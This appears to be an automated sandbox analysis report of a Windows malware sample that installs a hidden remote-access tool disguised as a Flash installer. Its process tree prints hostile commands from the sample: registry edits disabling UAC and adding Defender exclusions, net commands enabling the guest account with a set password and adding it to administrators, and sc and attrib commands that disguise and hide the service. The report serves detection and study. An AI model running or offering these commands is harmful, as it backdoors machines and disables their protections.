Analysis
- max time kernel: 151s
- max time network: 157s
- platform: windows10-2004_x64
- resource: win10v2004-20220721-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220721-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 01/08/2022, 05:48
Static task
static1
Behavioral task
behavioral1
Sample
5ca050af396a615d9f342b12ad4cb5ca1413b8ae8687bfd8f80bf83a859479bb.exe
Resource
win7-20220715-en
General
- Target: 5ca050af396a615d9f342b12ad4cb5ca1413b8ae8687bfd8f80bf83a859479bb.exe
- Size: 13.8MB
- MD5: 7092d2964964ec02188ecf9f07aefc88
- SHA1: e87994b619b5139e20b14db2a8b2d0a41e36a6e2
- SHA256: 5ca050af396a615d9f342b12ad4cb5ca1413b8ae8687bfd8f80bf83a859479bb
- SHA512: 6da77c955071b7f1a430ce4f559ee655658fdd1392c9136a9359a62e6270d0b1f2bfe616173911ae0cdb331200fa204dce63c5df16db08b6e03a41f9c3215a6c
Malware Config
Signatures
-
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | regedit.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | regedit.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | regedit.exe
-
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths | regedit.exe
-
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
resource | yara_rule
behavioral2/files/0x0006000000022ed8-202.dat | acprotect
behavioral2/files/0x0006000000022ed7-201.dat | acprotect
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
resource | yara_rule
behavioral2/files/0x0006000000022ed6-154.dat | aspack_v212_v242
behavioral2/files/0x0006000000022ed6-155.dat | aspack_v212_v242
behavioral2/files/0x0006000000022ed6-172.dat | aspack_v212_v242
behavioral2/files/0x0006000000022ed6-181.dat | aspack_v212_v242
behavioral2/files/0x0006000000022ed6-190.dat | aspack_v212_v242
behavioral2/files/0x0006000000022ed5-203.dat | aspack_v212_v242
behavioral2/files/0x0006000000022ed5-208.dat | aspack_v212_v242
behavioral2/files/0x0006000000022ed5-207.dat | aspack_v212_v242
behavioral2/files/0x0006000000022ed5-228.dat | aspack_v212_v242
-
Executes dropped EXE 12 IoCs
pid | Process
544 | flashplayer32_xa_install.exe
636 | svchost.exe
1588 | F1.exe
4328 | rutserv.exe
4400 | rms_id_testfix.exe
4440 | rms_id_test.exe
4512 | rutserv.exe
4872 | rutserv.exe
4988 | rutserv.exe
1952 | rfusclient.exe
1068 | rfusclient.exe
3152 | rfusclient.exe
-
resource | yara_rule
behavioral2/files/0x0006000000022ed8-202.dat | upx
behavioral2/files/0x0006000000022ed7-201.dat | upx
-
resource | yara_rule
behavioral2/files/0x0007000000022e84-136.dat | vmprotect
behavioral2/files/0x0007000000022e84-137.dat | vmprotect
behavioral2/memory/636-138-0x0000000000860000-0x0000000001C93000-memory.dmp | vmprotect
behavioral2/memory/636-162-0x0000000000860000-0x0000000001C93000-memory.dmp | vmprotect
behavioral2/memory/636-169-0x0000000000860000-0x0000000001C93000-memory.dmp | vmprotect
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation | F1.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation | WScript.exe
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
69 | api.ipify.org
72 | api.ipify.org
-
AutoIT Executable 7 IoCs
AutoIT scripts compiled to PE executables.
resource | yara_rule
behavioral2/memory/636-138-0x0000000000860000-0x0000000001C93000-memory.dmp | autoit_exe
behavioral2/memory/636-162-0x0000000000860000-0x0000000001C93000-memory.dmp | autoit_exe
behavioral2/files/0x0006000000022ed0-164.dat | autoit_exe
behavioral2/files/0x0007000000022e85-166.dat | autoit_exe
behavioral2/files/0x0007000000022e85-167.dat | autoit_exe
behavioral2/files/0x0006000000022ed0-168.dat | autoit_exe
behavioral2/memory/636-169-0x0000000000860000-0x0000000001C93000-memory.dmp | autoit_exe
-
Launches sc.exe 3 IoCs
Sc.exe is a Windows utility to control services on the system.
pid | Process
1396 | sc.exe
4348 | sc.exe
4492 | sc.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Delays execution with timeout.exe 1 IoCs
pid | Process
4308 | timeout.exe
-
Modifies registry class 7 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings | F1.exe
Key created | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\MIME\Database | rms_id_testfix.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset | rms_id_testfix.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage | rms_id_testfix.exe
Key created | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\MIME\Database | rms_id_test.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset | rms_id_test.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage | rms_id_test.exe
-
Runs .reg file with regedit 2 IoCs
pid | Process
4252 | regedit.exe
4280 | regedit.exe
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 22 IoCs
pid | Process
636 | svchost.exe
636 | svchost.exe
636 | svchost.exe
636 | svchost.exe
4328 | rutserv.exe
4328 | rutserv.exe
4328 | rutserv.exe
4328 | rutserv.exe
4328 | rutserv.exe
4328 | rutserv.exe
4512 | rutserv.exe
4512 | rutserv.exe
4872 | rutserv.exe
4872 | rutserv.exe
4988 | rutserv.exe
4988 | rutserv.exe
4988 | rutserv.exe
4988 | rutserv.exe
4988 | rutserv.exe
4988 | rutserv.exe
1952 | rfusclient.exe
1952 | rfusclient.exe
-
Suspicious behavior: SetClipboardViewer 1 IoCs
pid | Process
3152 | rfusclient.exe
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
description | pid | Process
Token: SeDebugPrivilege | 4328 | rutserv.exe
Token: SeDebugPrivilege | 4872 | rutserv.exe
Token: SeTakeOwnershipPrivilege | 4988 | rutserv.exe
Token: SeTcbPrivilege | 4988 | rutserv.exe
Token: SeTcbPrivilege | 4988 | rutserv.exe
-
Suspicious use of FindShellTrayWindow 7 IoCs
pid | Process
4400 | rms_id_testfix.exe
4400 | rms_id_testfix.exe
4400 | rms_id_testfix.exe
4440 | rms_id_test.exe
4440 | rms_id_test.exe
4440 | rms_id_test.exe
4440 | rms_id_test.exe
-
Suspicious use of SendNotifyMessage 7 IoCs
pid | Process
4400 | rms_id_testfix.exe
4400 | rms_id_testfix.exe
4400 | rms_id_testfix.exe
4440 | rms_id_test.exe
4440 | rms_id_test.exe
4440 | rms_id_test.exe
4440 | rms_id_test.exe
-
Suspicious use of SetWindowsHookEx 8 IoCs
pid | Process
544 | flashplayer32_xa_install.exe
544 | flashplayer32_xa_install.exe
544 | flashplayer32_xa_install.exe
544 | flashplayer32_xa_install.exe
4328 | rutserv.exe
4512 | rutserv.exe
4872 | rutserv.exe
4988 | rutserv.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Views/modifies file attributes 1 TTPs 2 IoCs
pid | Process
2032 | attrib.exe
2784 | attrib.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\5ca050af396a615d9f342b12ad4cb5ca1413b8ae8687bfd8f80bf83a859479bb.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\5ca050af396a615d9f342b12ad4cb5ca1413b8ae8687bfd8f80bf83a859479bb.exe"
  PID: 2848
  Signatures: Suspicious use of WriteProcessMemory
  - C:\ProgramData\Microsoft\Install\flashplayer32_xa_install.exe
    Command line: C:\ProgramData\Microsoft\Install\flashplayer32_xa_install.exe
    PID: 544
    Signatures: Executes dropped EXE; Suspicious use of SetWindowsHookEx
  - C:\ProgramData\Microsoft\Install\svchost.exe
    Command line: C:\ProgramData\Microsoft\Install\svchost.exe
    PID: 636
    Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
    - C:\ProgramData\Microsoft\Install\F1.exe
      Command line: C:\ProgramData\Microsoft\Install\F1.exe -pklark
      PID: 1588
      Signatures: Executes dropped EXE; Checks computer location settings; Modifies registry class; Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\WScript.exe
        Command line: "C:\Windows\System32\WScript.exe" "C:\Programdata\Windows\install.vbs"
        PID: 4116
        Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
        - C:\Windows\SysWOW64\cmd.exe
          Command line: C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
          PID: 4200
          Signatures: Suspicious use of WriteProcessMemory
          - C:\Windows\SysWOW64\regedit.exe
            Command line: regedit /s "reg1.reg"
            PID: 4252
            Signatures: UAC bypass; Windows security bypass; Runs .reg file with regedit
          - C:\Windows\SysWOW64\regedit.exe
            Command line: regedit /s "reg2.reg"
            PID: 4280
            Signatures: Runs .reg file with regedit
          - C:\Windows\SysWOW64\timeout.exe
            Command line: timeout 2
            PID: 4308
            Signatures: Delays execution with timeout.exe
          - C:\Programdata\Windows\rutserv.exe
            Command line: rutserv.exe /silentinstall
            PID: 4328
            Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx
          - C:\Programdata\Windows\rutserv.exe
            Command line: rutserv.exe /firewall
            PID: 4512
            Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of SetWindowsHookEx
          - C:\Programdata\Windows\rutserv.exe
            Command line: rutserv.exe /start
            PID: 4872
            Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx
          - C:\Windows\SysWOW64\attrib.exe
            Command line: ATTRIB +H +S C:\Programdata\Windows\*.*
            PID: 2032
            Signatures: Views/modifies file attributes
          - C:\Windows\SysWOW64\attrib.exe
            Command line: ATTRIB +H +S C:\Programdata\Windows
            PID: 2784
            Signatures: Views/modifies file attributes
          - C:\Windows\SysWOW64\sc.exe
            Command line: sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
            PID: 4348
            Signatures: Launches sc.exe
          - C:\Windows\SysWOW64\sc.exe
            Command line: sc config RManService obj= LocalSystem type= interact type= own
            PID: 4492
            Signatures: Launches sc.exe
          - C:\Windows\SysWOW64\sc.exe
            Command line: sc config RManService DisplayName= "Microsoft Framework"
            PID: 1396
            Signatures: Launches sc.exe
    - C:\ProgramData\Microsoft\Install\rms_id_testfix.exe
      Command line: C:\ProgramData\Microsoft\Install\rms_id_testfix.exe
      PID: 4400
      Signatures: Executes dropped EXE; Modifies registry class; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage
  - C:\ProgramData\Microsoft\Install\rms_id_test.exe
    Command line: C:\ProgramData\Microsoft\Install\rms_id_test.exe
    PID: 4440
    Signatures: Executes dropped EXE; Modifies registry class; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage
  - C:\Windows\SysWOW64\net.exe
    Command line: net user guest 1ASDqweasdqwe
    PID: 4960
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\net1.exe
      Command line: C:\Windows\system32\net1 user guest 1ASDqweasdqwe
      PID: 1064
  - C:\Windows\SysWOW64\net.exe
    Command line: net localgroup administrators guest /add
    PID: 5032
    Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\net.exe
    Command line: net user guest /active:yes
    PID: 4980
    Signatures: Suspicious use of WriteProcessMemory
- C:\Programdata\Windows\rutserv.exe
  Command line: C:\Programdata\Windows\rutserv.exe
  PID: 4988
  Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
  - C:\Programdata\Windows\rfusclient.exe
    Command line: C:\Programdata\Windows\rfusclient.exe /tray
    PID: 1068
    Signatures: Executes dropped EXE
  - C:\Programdata\Windows\rfusclient.exe
    Command line: C:\Programdata\Windows\rfusclient.exe
    PID: 1952
    Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses
    - C:\Programdata\Windows\rfusclient.exe
      Command line: C:\Programdata\Windows\rfusclient.exe /tray
      PID: 3152
      Signatures: Executes dropped EXE; Suspicious behavior: SetClipboardViewer
- C:\Windows\SysWOW64\net1.exe
  Command line: C:\Windows\system32\net1 localgroup administrators guest /add
  PID: 4176
- C:\Windows\SysWOW64\net1.exe
  Command line: C:\Windows\system32\net1 user guest /active:yes
  PID: 4160
Network
MITRE ATT&CK Enterprise v6
Downloads